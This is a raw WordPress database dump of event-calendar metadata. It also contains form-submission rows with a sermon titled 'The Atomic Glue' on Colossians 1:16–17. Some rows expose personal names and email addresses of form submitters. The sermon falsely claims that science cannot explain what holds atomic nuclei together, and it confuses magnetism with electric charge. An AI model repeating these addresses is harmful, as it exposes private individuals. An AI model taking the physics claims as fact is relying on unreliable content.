s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(119702,262987,'_field_137','The Atomic Glue'),(118450,262863,'_RTECregistrationsDisabled','1'),(118451,262863,'_RTECdeadlineType','start'),(118452,262863,'_RTECwhoCanRegister','any'),(118453,262863,'_RTEClimitRegistrations','0'),(118448,262863,'_EventOrigin','events-calendar'),(118456,262863,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118457,262863,'_EventShowMapLink','1'),(118458,262863,'_EventShowMap','1'),(118459,262863,'_EventVenueID','262507'),(118460,262863,'_EventCurrencySymbol',''),(118461,262863,'_EventCurrencyPosition','prefix'),(118462,262863,'_EventCost',''),(118463,262863,'_EventURL',''),(118446,262863,'protect_children',''),(118447,262863,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118454,262863,'_RTECmaxRegistrations','30'),(118455,262863,'boldgrid_hide_page_title','0'),(116544,262864,'_EventStartDate','2021-06-06 09:00:00'),(116545,262864,'_EventStartDateUTC','2021-06-06 15:00:00'),(116546,262864,'_EventEndDate','2021-06-06 10:15:00'),(116547,262864,'_EventEndDateUTC','2021-06-06 16:15:00'),(116548,262864,'_EventDuration','4500'),(119703,262987,'_field_138','The Atomic Glue\n\nApostle Paul goes on to describe the work of Jesus.\n\n\"For by him all things were created: things in heaven and on earth, visible and invisible, whether thrones or powers or rulers or authorities; all things were created by him and for him.\" \n(Colossians 1:16)\n\nApostle Paul is proclaiming here when he says that Jesus is the \"creator of all things...things were made by him.\" Now, as this verse goes on to say, that includes more than merely the material universe around us: more than stars, galaxies, superstars, planets, and solar systems, or even trees, grass, mountains and seas. It includes the earth, Paul says, but also heaven. Both the visible and the invisible. It would also include all forces. Electricity was invented by Jesus (not as a man, but as the Eternal Son) before the creation of the world. It would include radiation, magnetism, and the peculiar and mysterious dance of electrons from one level of energy to another within the atom that makes light. All this was the design of the Eternal Son.\n\nBut not only forces, but concepts and attitudes as well: grace, mercy, truth, love, and life itself. Jesus is the originator of all life. And, as Paul specifies here, a whole pantheon of invisible beings (and their visible counterparts in earthly government): \"thrones and rulers and powers and authorities\"---all were created by him. The Colossian heresy here becomes visible in our modern experience as well. The Colossians began to believe, because of the Greek teachers among them, that the universe consisted of a \"hierarchy of angels.\" One must begin down at the bottom, with raunchy, unpleasant angels, and work one\'s way up through the whole hierarchy to the good angels and, finally, to God. From that idea has come the eastern concept of reincarnation for that too was part of the Colossian heresy.\n\nWe find a counterpart today, not only in the theory of reincarnation, but also in horoscopes and astrology---the idea of stars influencing and governing our lives. The claim that Transcendental Meditation is the means of getting in touch with invisible beings is another example. We are told that there are Astral Teachers and Divine Masters who appear from time to time to impart degrees of knowledge to the human race. Gradually, we are told, this is to result, after centuries and centuries of progress, in our being lost in the Divine presence. All this is nothing new. It is very old, but it is also new, appearing again and again in history. This is what the apostle labors to correct. He is telling the Colossians, \"Jesus is above all angels. You are freed from bondage to these lesser beings when you see the true authority and power of your risen Lord.\"\n\n\nJesus controls space and history:\n\"He is before all things, and in him all things hold together.\" (Colossians 1:17)\n\n\"He is before all things,\" means he is outside his own creation; he was there first.\n\nWhen Paul uses the phrase, \"all things by him hold together,\" he is speaking of our Lord\'s power to sustain and to prevent breakdown. The scientists who work on the great linear accelerator (a relatively small instrument) at Stanford University, trying to smash the atom apart, know that it takes incredible power.\n\nA Stanford University Professor said: \"The power to operate this instrument, is equivalent to all the electricity it takes to run the city of San Francisco.\"\n\nSomething holds the atom together with enormous, incredible power. That power, according to the Word of God (both here in Colossians and in the letter to the Hebrews is vested in Jesus. He has the authority to rule as Sovereign. He has the power to sustain, because he is the Eternal Son.\n\nIf you have a magnet in your right hand a magnet in your left hand, and you push the positive ends towards each other, they push away. Opposite charges attract; like charges repel.  But here’s a great mystery: in the nucleus of the atom, protons are packed together which are all positive-charged particles.\n\nWhat keeps these positive-charged protons from repelling like the magnets? What holds them together? Science doesn’t know.  You can study quantum physics and learn lots of hypotheses and theories, yet to this day, it’s a mystery to scientists, but not to Christians, for Scriptures tells us the real answers.  It is Jesus Christ who holds all things together.  And the day is coming when, suddenly, He will let go…\n\n	“But the day of the Lord will come as a thief in the night; in\n	which the heavens shall pass away with a great noise, and\n	the elements shall melt with intense heat, the earth and its\n	works will be burned up.”  (II Peter 3:10)\n\n\nThis was written before man knew anything about nuclear physics or about an atomic reaction could actually melt the basic building blocks of matter itself.  God was prophesying how the world would end.\n\n\nBut now we know if the “atomic glue” which holds the atom together were to suddenly disappear, everything would dissolve in zillion degree “intense heat” accompanied by a “great noise” so powerful and quick it wouldn’t even be heard.\n\n	\nThe most astonishing phenomenon today is to see men who work with this physical universe, who intimately observe the beauty, order, and power inherent in the natural world as well as in the world of humanity, yet who fail to see the Power behind it all; the ordered Intelligence that possesses and originates all these things. It is difficult to understand a man like Carl Sagan can work in the field of astronomy, knowing of the great secrets that are now coming to light in the universe, and yet go on breathing air which God has supplied, eating the food with which God has stocked this earth, and relying moment by moment on a heartbeat whose continuation rests in the will of Someone other than himself, yet can busy himself telling us that only man matters! \n\n'),(118487,262865,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118483,262864,'_EventCost',''),(118484,262864,'_EventURL',''),(118485,262864,'_EventTimezone','America/Denver'),(118486,262864,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118471,262864,'_RTECregistrationsDisabled','1'),(118472,262864,'_RTECdeadlineType','start'),(118473,262864,'_RTECwhoCanRegister','any'),(118474,262864,'_RTEClimitRegistrations','0'),(118469,262864,'_EventOrigin','events-calendar'),(118476,262864,'boldgrid_hide_page_title','0'),(118477,262864,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118481,262864,'_EventCurrencySymbol',''),(118482,262864,'_EventCurrencyPosition','prefix'),(118478,262864,'_EventShowMapLink','1'),(118479,262864,'_EventShowMap','1'),(118480,262864,'_EventVenueID','262507'),(118467,262864,'protect_children',''),(118468,262864,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118475,262864,'_RTECmaxRegistrations','30'),(118559,262868,'_RTECmaxRegistrations','30'),(118560,262868,'boldgrid_hide_page_title','0'),(116574,262865,'_EventStartDate','2021-07-04 09:00:00'),(118709,262915,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(116575,262865,'_EventStartDateUTC','2021-07-04 15:00:00'),(116576,262865,'_EventEndDate','2021-07-04 10:15:00'),(116577,262865,'_EventEndDateUTC','2021-07-04 16:15:00'),(116578,262865,'_EventDuration','4500'),(119695,262986,'_field_357','spiritual laws of life'),(119696,262986,'_field_358','Yes I would love to join you!'),(119697,262986,'_form_id','38'),(119698,262986,'_seq_num','2'),(119700,262987,'_field_134','gouda'),(119701,262987,'_field_135','a.gouda@gmx.com'),(118506,262865,'_EventTimezone','America/Denver'),(118507,262865,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118508,262866,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513660;s:13:\"_EventVenueID\";i:1607513660;s:20:\"_EventCurrencySymbol\";i:1607513660;s:22:\"_EventCurrencyPosition\";i:1607513660;s:10:\"_EventCost\";i:1607513660;s:9:\"_EventURL\";i:1607513660;s:14:\"_EventTimezone\";i:1607513660;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(118492,262865,'_RTECregistrationsDisabled','1'),(118493,262865,'_RTECdeadlineType','start'),(118494,262865,'_RTECwhoCanRegister','any'),(118495,262865,'_RTEClimitRegistrations','0'),(118490,262865,'_EventOrigin','events-calendar'),(118498,262865,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118499,262865,'_EventShowMapLink','1'),(118500,262865,'_EventShowMap','1'),(118501,262865,'_EventVenueID','262507'),(118502,262865,'_EventCurrencySymbol',''),(118503,262865,'_EventCurrencyPosition','prefix'),(118504,262865,'_EventCost',''),(118505,262865,'_EventURL',''),(118488,262865,'protect_children',''),(118489,262865,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513659;s:13:\"_EventVenueID\";i:1607513659;s:20:\"_EventCurrencySymbol\";i:1607513659;s:22:\"_EventCurrencyPosition\";i:1607513659;s:10:\"_EventCost\";i:1607513659;s:9:\"_EventURL\";i:1607513659;s:14:\"_EventTimezone\";i:1607513659;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513659;}'),(118496,262865,'_RTECmaxRegistrations','30'),(118497,262865,'boldgrid_hide_page_title','0'),(116604,262866,'_EventStartDate','2021-08-01 09:00:00'),(116605,262866,'_EventStartDateUTC','2021-08-01 15:00:00'),(116606,262866,'_EventEndDate','2021-08-01 10:15:00'),(118710,262915,'protect_children',''),(116607,262866,'_EventEndDateUTC','2021-08-01 16:15:00'),(116608,262866,'_EventDuration','4500'),(119692,262986,'_field_353','LYNNZIE'),(119693,262986,'_field_354','SUTTON'),(119694,262986,'_field_355','lynnzies3@gmail.com'),(118529,262867,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513660;s:12:\"_EventOrigin\";i:1607513660;s:13:\"_thumbnail_id\";i:1607513660;s:26:\"_RTECregistrationsDisabled\";i:1607513660;s:17:\"_RTECdeadlineType\";i:1607513660;s:19:\"_RTECwhoCanRegister\";i:1607513660;s:23:\"_RTEClimitRegistrations\";i:1607513660;s:21:\"_RTECmaxRegistrations\";i:1607513660;s:24:\"boldgrid_hide_page_title\";i:1607513660;s:16:\"_EventRecurrence\";i:1607513660;s:17:\"_EventShowMapLink\";i:1607513660;s:13:\"_EventShowMap\";i:1607513660;s:13:\"_EventVenueID\";i:1607513660;s:20:\"_EventCurrencySymbol\";i:1607513660;s:22:\"_EventCurrencyPosition\";i:1607513660;s:10:\"_EventCost\";i:1607513660;s:9:\"_EventURL\";i:1607513660;s:14:\"_EventTimezone\";i:1607513660;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(118525,262866,'_EventCost',''),(118526,262866,'_EventURL',''),(118527,262866,'_EventTimezone','America/Denver'),(118528,262866,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118513,262866,'_RTECregistrationsDisabled','1'),(118514,262866,'_RTECdeadlineType','start'),(118515,262866,'_RTECwhoCanRegister','any'),(118516,262866,'_RTEClimitRegistrations','0'),(118511,262866,'_EventOrigin','events-calendar'),(118518,262866,'boldgrid_hide_page_title','0'),(118519,262866,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118523,262866,'_EventCurrencySymbol',''),(118524,262866,'_EventCurrencyPosition','prefix'),(118520,262866,'_EventShowMapLink','1'),(118521,262866,'_EventShowMap','1'),(118522,262866,'_EventVenueID','262507'),(118509,262866,'protect_children',''),(118510,262866,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513659;s:12:\"_EventOrigin\";i:1607513659;s:13:\"_thumbnail_id\";i:1607513659;s:26:\"_RTECregistrationsDisabled\";i:1607513659;s:17:\"_RTECdeadlineType\";i:1607513659;s:19:\"_RTECwhoCanRegister\";i:1607513659;s:23:\"_RTEClimitRegistrations\";i:1607513659;s:21:\"_RTECmaxRegistrations\";i:1607513659;s:24:\"boldgrid_hide_page_title\";i:1607513659;s:16:\"_EventRecurrence\";i:1607513659;s:17:\"_EventShowMapLink\";i:1607513659;s:13:\"_EventShowMap\";i:1607513660;s:13:\"_EventVenueID\";i:1607513660;s:20:\"_EventCurrencySymbol\";i:1607513660;s:22:\"_EventCurrencyPosition\";i:1607513660;s:10:\"_EventCost\";i:1607513660;s:9:\"_EventURL\";i:1607513660;s:14:\"_EventTimezone\";i:1607513660;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(118517,262866,'_RTECmaxRegistrations','30'),(118562,262868,'_EventShowMapLink','1'),(118563,262868,'_EventShowMap','1'),(116634,262867,'_EventStartDate','2021-09-05 09:00:00'),(116635,262867,'_EventStartDateUTC','2021-09-05 15:00:00'),(116636,262867,'_EventEndDate','2021-09-05 10:15:00'),(116637,262867,'_EventEndDateUTC','2021-09-05 16:15:00'),(116638,262867,'_EventDuration','4500'),(118773,262918,'protect_children',''),(118815,262953,'_EventShowMap','1'),(118752,262917,'protect_children',''),(118772,262918,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_EventCurrencySymbol\";i:1607513876;s:22:\"_EventCurrencyPosition\";i:1607513876;s:10:\"_EventCost\";i:1607513876;s:9:\"_EventURL\";i:1607513876;s:14:\"_EventTimezone\";i:1607513876;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513876;s:13:\"_thumbnail_id\";i:1607513876;}'),(118548,262867,'_EventTimezone','America/Denver'),(118549,262867,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118550,262868,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513660;s:12:\"_EventOrigin\";i:1607513660;s:13:\"_thumbnail_id\";i:1607513660;s:26:\"_RTECregistrationsDisabled\";i:1607513660;s:17:\"_RTECdeadlineType\";i:1607513660;s:19:\"_RTECwhoCanRegister\";i:1607513660;s:23:\"_RTEClimitRegistrations\";i:1607513660;s:21:\"_RTECmaxRegistrations\";i:1607513660;s:24:\"boldgrid_hide_page_title\";i:1607513660;s:16:\"_EventRecurrence\";i:1607513660;s:17:\"_EventShowMapLink\";i:1607513660;s:13:\"_EventShowMap\";i:1607513660;s:13:\"_EventVenueID\";i:1607513660;s:20:\"_EventCurrencySymbol\";i:1607513660;s:22:\"_EventCurrencyPosition\";i:1607513660;s:10:\"_EventCost\";i:1607513660;s:9:\"_EventURL\";i:1607513660;s:14:\"_EventTimezone\";i:1607513660;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(118534,262867,'_RTECregistrationsDisabled','1'),(118535,262867,'_RTECdeadlineType','start'),(118536,262867,'_RTECwhoCanRegister','any'),(118537,262867,'_RTEClimitRegistrations','0'),(118532,262867,'_EventOrigin','events-calendar'),(118540,262867,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-03\";s:14:\"EventStartDate\";s:19:\"2020-12-06 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-06 10:15:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(118541,262867,'_EventShowMapLink','1'),(118542,262867,'_EventShowMap','1'),(118543,262867,'_EventVenueID','262507'),(118544,262867,'_EventCurrencySymbol',''),(118545,262867,'_EventCurrencyPosition','prefix'),(118546,262867,'_EventCost',''),(118547,262867,'_EventURL',''),(118530,262867,'protect_children',''),(118531,262867,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513660;s:12:\"_EventOrigin\";i:1607513660;s:13:\"_thumbnail_id\";i:1607513660;s:26:\"_RTECregistrationsDisabled\";i:1607513660;s:17:\"_RTECdeadlineType\";i:1607513660;s:19:\"_RTECwhoCanRegister\";i:1607513660;s:23:\"_RTEClimitRegistrations\";i:1607513660;s:21:\"_RTECmaxRegistrations\";i:1607513660;s:24:\"boldgrid_hide_page_title\";i:1607513660;s:16:\"_EventRecurrence\";i:1607513660;s:17:\"_EventShowMapLink\";i:1607513660;s:13:\"_EventShowMap\";i:1607513660;s:13:\"_EventVenueID\";i:1607513660;s:20:\"_EventCurrencySymbol\";i:1607513660;s:22:\"_EventCurrencyPosition\";i:1607513660;s:10:\"_EventCost\";i:1607513660;s:9:\"_EventURL\";i:1607513660;s:14:\"_EventTimezone\";i:1607513660;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607513660;}'),(118538,262867,'_RTECmaxRegistrations','30'),(118539,262867,'boldgrid_hide_page_title','0'),(118564,262868,'_EventVenueID','262507'),(118565,262868,'_EventCurrencySymbol',''),(118566,262868,'_EventCurrencyPosition','prefix'),(118567,262868,'_EventCost',''),(118568,262868,'_EventURL',''),(118569,262868,'_EventTimezone','America/Denver'),(118570,262868,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262859;a:2:{s:9:\"timestamp\";i:1609664400;s:8:\"duration\";i:4500;}i:262860;a:2:{s:9:\"timestamp\";i:1612688400;s:8:\"duration\";i:4500;}i:262861;a:2:{s:9:\"timestamp\";i:1615107600;s:8:\"duration\";i:4500;}i:262862;a:2:{s:9:\"timestamp\";i:1617526800;s:8:\"duration\";i:4500;}i:262863;a:2:{s:9:\"timestamp\";i:1619946000;s:8:\"duration\";i:4500;}i:262864;a:2:{s:9:\"timestamp\";i:1622970000;s:8:\"duration\";i:4500;}i:262865;a:2:{s:9:\"timestamp\";i:1625389200;s:8:\"duration\";i:4500;}i:262866;a:2:{s:9:\"timestamp\";i:1627808400;s:8:\"duration\";i:4500;}i:262867;a:2:{s:9:\"timestamp\";i:1630832400;s:8:\"duration\";i:4500;}i:262868;a:2:{s:9:\"timestamp\";i:1633251600;s:8:\"duration\